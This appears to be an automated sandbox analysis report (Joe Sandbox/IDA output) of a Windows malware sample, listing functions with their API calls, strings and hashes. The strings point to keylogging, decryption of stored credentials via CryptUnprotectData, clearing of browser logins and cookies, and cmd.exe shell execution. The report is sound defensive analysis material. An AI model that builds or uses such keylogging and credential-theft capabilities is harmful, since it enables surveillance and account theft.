                                                  • Instruction Fuzzy Hash: 88114272404118AACB19AB96EC55CFE77BCEE48315B00012FF506A61D1FF7C5A45C6AD
                                                  APIs
                                                    • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                    • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040AFA9
                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040AFB5
                                                  • CreateThread.KERNEL32(00000000,00000000,0040A2D0,?,00000000,00000000), ref: 0040AFC1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateThread$LocalTime$wsprintf
                                                  • String ID: Online Keylogger Started
                                                  • API String ID: 112202259-1258561607
                                                  • Opcode ID: 0fcd38e96aacb40c04b118771990cdae8bba74e61c9056a984dbcae37755a7c2
                                                  • Instruction ID: 1fd114496b08e8c1d91a2f23279a740fccf8855fe00c80ef0b78f2cd7c44f0e8
                                                  • Opcode Fuzzy Hash: 0fcd38e96aacb40c04b118771990cdae8bba74e61c9056a984dbcae37755a7c2
                                                  • Instruction Fuzzy Hash: 2A01C4A07003193EE62076368C8BDBF7A6DCA91398F4004BFF641362C2E97D1C1586FA
                                                  APIs
                                                  • CloseHandle.KERNEL32(00000000,00000000,0040F3F6,?,0044BD0A,0040F3F6,0046EBC0,0000000C), ref: 0044BE42
                                                  • GetLastError.KERNEL32(?,0044BD0A,0040F3F6,0046EBC0,0000000C), ref: 0044BE4C
                                                  • __dosmaperr.LIBCMT ref: 0044BE77
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseErrorHandleLast__dosmaperr
                                                  • String ID: H_m
                                                  • API String ID: 2583163307-2414369044
                                                  • Opcode ID: ab3bdfcabf878abbb2a2aeea4d5a33dbce79a0e4a90767e54580a22618b404bc
                                                  • Instruction ID: c640735ad7e51643fe6b0a0a71fefea3e0d0f945221813f090adf85c72c27ea1
                                                  • Opcode Fuzzy Hash: ab3bdfcabf878abbb2a2aeea4d5a33dbce79a0e4a90767e54580a22618b404bc
                                                  • Instruction Fuzzy Hash: AC01483260066866E624623858457BF6789CBC2739F35022FFE18872C3DF6CCC8181D9
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406ABD
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00406AC4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: CryptUnprotectData$crypt32
                                                  • API String ID: 2574300362-2380590389
                                                  • Opcode ID: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                  • Instruction ID: 59ed3cbb63f31e38ea488d6bd85f24bb9ff1ce5495ed4d1509158228521d53cd
                                                  • Opcode Fuzzy Hash: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                  • Instruction Fuzzy Hash: 2C01B975604216BBCB18CFAD9D449AF7BB4AB45300B00417EE956E3381DA74E9008B95
                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                                  • CloseHandle.KERNEL32(?), ref: 004051CA
                                                  • SetEvent.KERNEL32(?), ref: 004051D9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseEventHandleObjectSingleWait
                                                  • String ID: Connection Timeout
                                                  • API String ID: 2055531096-499159329
                                                  • Opcode ID: cfa6aba80e3ab73a333b17ef678a4c224e2718187884c1035a1560e2fee3ab95
                                                  • Instruction ID: b176daa04f7f78a72cd0d213bf0bcd41e0e3849ccec9e2477ca34bbc74fb9340
                                                  • Opcode Fuzzy Hash: cfa6aba80e3ab73a333b17ef678a4c224e2718187884c1035a1560e2fee3ab95
                                                  • Instruction Fuzzy Hash: C901F530940F00AFD7216B368D8642BBFE0EF00306704093EE68356AE2D6789800CF89
                                                  APIs
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Exception@8Throw
                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                  • API String ID: 2005118841-1866435925
                                                  • Opcode ID: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                                  • Instruction ID: 287a1f786264602a2f100ba68ee8cd07dacd1bfc9ef62352ff5e55a88b78f620
                                                  • Opcode Fuzzy Hash: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                                  • Instruction Fuzzy Hash: 59018F626583087AEB14B697CC03FBA33685B10708F10CC3BBD01765C2EA7D6A61C66F
                                                  APIs
                                                  • RegCreateKeyW.ADVAPI32(80000001,00000000,?), ref: 0041385A
                                                  • RegSetValueExW.ADVAPI32(?,?,00000000,00000001,00000000,00000000,004752F0,?,0040F85E,pth_unenc,86l), ref: 00413888
                                                  • RegCloseKey.ADVAPI32(?,?,0040F85E,pth_unenc,86l), ref: 00413893
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateValue
                                                  • String ID: pth_unenc
                                                  • API String ID: 1818849710-4028850238
                                                  • Opcode ID: d69e82d7a202b39eabff8c6d6945ecb801863ff8e3666436e459375cd1f846cd
                                                  • Instruction ID: 9133f253890910ff78e8f434c24b82038cc7026402723a24ca4ec17c3e6d8cb5
                                                  • Opcode Fuzzy Hash: d69e82d7a202b39eabff8c6d6945ecb801863ff8e3666436e459375cd1f846cd
                                                  • Instruction Fuzzy Hash: 15F0C271440218FBCF00AFA1EC45FEE376CEF00756F10452AF905A61A1E7759E04DA94
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFEC
                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E02B
                                                    • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 004356EC
                                                    • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 00435710
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E051
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                  • String ID: bad locale name
                                                  • API String ID: 3628047217-1405518554
                                                  • Opcode ID: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                  • Instruction ID: 7f9ccd90240ef42149755af47b5df127ed13e8783c268b42739d505c0e35a915
                                                  • Opcode Fuzzy Hash: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                  • Instruction Fuzzy Hash: 77F08131544A085AC338FA62D863DDA73B49F14358F50457FB406268D2EF78BA0CCA9D
                                                  APIs
                                                  • RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,`m), ref: 00413678
                                                  • RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                                  • RegCloseKey.ADVAPI32(?), ref: 004136A0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID: `m
                                                  • API String ID: 3677997916-2103878915
                                                  • Opcode ID: cdbe77b62fdb326fa84ed0ef2b451dd3af455626e780c5cb96fc0720a69048d7
                                                  • Instruction ID: b2ddc0a972744091932d43abea1e646d3cdf78111d27e2b843060007377f7c4f
                                                  • Opcode Fuzzy Hash: cdbe77b62fdb326fa84ed0ef2b451dd3af455626e780c5cb96fc0720a69048d7
                                                  • Instruction Fuzzy Hash: B7F04F75600218FBDF209B90DC05FDD7B7CEB04B15F1040A2BA45B5291DB749F949BA8
                                                  APIs
                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0001D4EE,00000000,00000000,00000000), ref: 00416C82
                                                  • ShowWindow.USER32(00000009), ref: 00416C9C
                                                  • SetForegroundWindow.USER32 ref: 00416CA8
                                                    • Part of subcall function 0041CE2C: AllocConsole.KERNEL32(00475338), ref: 0041CE35
                                                    • Part of subcall function 0041CE2C: GetConsoleWindow.KERNEL32 ref: 0041CE3B
                                                    • Part of subcall function 0041CE2C: ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                    • Part of subcall function 0041CE2C: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Window$Console$Show$AllocCreateForegroundOutputThread
                                                  • String ID: !D@
                                                  • API String ID: 186401046-604454484
                                                  • Opcode ID: dddbeebbe8cb821cdc8b1c7d2847af7eb141aaddcd72dd608c7fa4ca11ce81ef
                                                  • Instruction ID: 9f5213224becab59645eda34593d96b16d6ada18beeab21aaf628210512d7754
                                                  • Opcode Fuzzy Hash: dddbeebbe8cb821cdc8b1c7d2847af7eb141aaddcd72dd608c7fa4ca11ce81ef
                                                  • Instruction Fuzzy Hash: ECF05E70149340EAD720AB62ED45AFA7B69EB54341F01487BF909C20F2DB389C94865E
                                                  APIs
                                                  • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041616B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExecuteShell
                                                  • String ID: /C $cmd.exe$open
                                                  • API String ID: 587946157-3896048727
                                                  • Opcode ID: 16ef31fdaf301ba362d07f058173c5de43aaddf50e1ff7222e4b3bcda840a0cd
                                                  • Instruction ID: 08f4dee505367bf09000beb2be63de5ecd082ae46aa0e0363999309db21c3e05
                                                  • Opcode Fuzzy Hash: 16ef31fdaf301ba362d07f058173c5de43aaddf50e1ff7222e4b3bcda840a0cd
                                                  • Instruction Fuzzy Hash: 5EE0C0B0204305ABC605F675DC96CBF73ADAA94749B50483F7142A20E2EF7C9D49C65D
                                                  APIs
                                                  • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8B1
                                                  • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8DC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DeleteDirectoryFileRemove
                                                  • String ID: pth_unenc$xdF
                                                  • API String ID: 3325800564-2448381268
                                                  • Opcode ID: d40ba35bdc574994431a00040681681ffd5cebc2bb5ef4fca25f9a910d4daf75
                                                  • Instruction ID: ee660421d7ec44f6c6eaad5e9e1fc6482a22fb53094cf60c5c3e5a772ac54322
                                                  • Opcode Fuzzy Hash: d40ba35bdc574994431a00040681681ffd5cebc2bb5ef4fca25f9a910d4daf75
                                                  • Instruction Fuzzy Hash: 5AE04F314006109BC610BB218854AD6335CAB04316F00497BE4A3A35A1DF38AC49D658
                                                  APIs
                                                  • TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,86l,004752F0,?,pth_unenc), ref: 0040B8F6
                                                  • UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
                                                  • TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: TerminateThread$HookUnhookWindows
                                                  • String ID: pth_unenc
                                                  • API String ID: 3123878439-4028850238
                                                  • Opcode ID: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                  • Instruction ID: 372ac16de24f92ae7b862ff59389ff52a9cc8b3ac2037ffe6dc6d1e564519698
                                                  • Opcode Fuzzy Hash: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                  • Instruction Fuzzy Hash: 71E01272204315EFD7201F909C888667AADEE1539632409BEF6C261BB6CB7D4C54C79D
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __alldvrm$_strrchr
                                                  • String ID:
                                                  • API String ID: 1036877536-0
                                                  • Opcode ID: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                  • Instruction ID: 8ce1af842cd152cb2b2428f5d584a25f6c9224aafe101b92c03b71ca88d34985
                                                  • Opcode Fuzzy Hash: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                  • Instruction Fuzzy Hash: 87A156729846829FF721CF58C8817AEBBA5FF15314F2841AFE8859B381D27C8C51C75A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                  • Instruction ID: b0a34e1ed6630e1fb57c9e62860a3601010315cd62f19612bff23542d182db60
                                                  • Opcode Fuzzy Hash: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                  • Instruction Fuzzy Hash: 70412AB1600704BFE724AF79CD41B5EBBE8EB88714F10462FF145DB281E3B999058798
                                                  APIs
                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                                  • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00404DD2
                                                  • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00404DDB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                  • String ID:
                                                  • API String ID: 3360349984-0
                                                  • Opcode ID: 9e0a8eaf4219b775e830663fcb54a959b6233ae16d1ef5de7dcca6256e783451
                                                  • Instruction ID: 30d48123e17294c38ae6f490953f1b42a5ca81467cb0df1087f173bd09261e59
                                                  • Opcode Fuzzy Hash: 9e0a8eaf4219b775e830663fcb54a959b6233ae16d1ef5de7dcca6256e783451
                                                  • Instruction Fuzzy Hash: 684182B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                                  APIs
                                                  Strings
                                                  • [Cleared browsers logins and cookies.], xrefs: 0040C11F
                                                  • Cleared browsers logins and cookies., xrefs: 0040C130
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                  • API String ID: 3472027048-1236744412
                                                  • Opcode ID: 0289ad399ee06c172ada9225b32ea6f8a1a1d489767f054ef65d2596f31f8a52
                                                  • Instruction ID: 5a72b8a34604a64e244bad04561a930bad76f77e78bf22f3e088d6afb7384554
                                                  • Opcode Fuzzy Hash: 0289ad399ee06c172ada9225b32ea6f8a1a1d489767f054ef65d2596f31f8a52
                                                  • Instruction Fuzzy Hash: A431A805648381EDD6116BF514967AB7B824A53748F0882BFB8C4373C3DA7A4808C79F
                                                  APIs
                                                    • Part of subcall function 0041C5E2: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C5F2
                                                    • Part of subcall function 0041C5E2: GetWindowTextLengthW.USER32(00000000), ref: 0041C5FB
                                                    • Part of subcall function 0041C5E2: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C625
                                                  • Sleep.KERNEL32(000001F4), ref: 0040A5AE
                                                  • Sleep.KERNEL32(00000064), ref: 0040A638
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Window$SleepText$ForegroundLength
                                                  • String ID: [ $ ]
                                                  • API String ID: 3309952895-93608704
                                                  • Opcode ID: f02f1a0373de4d905e268f57495fa08b349ea431ac4d969b5d726f466b44a1dd
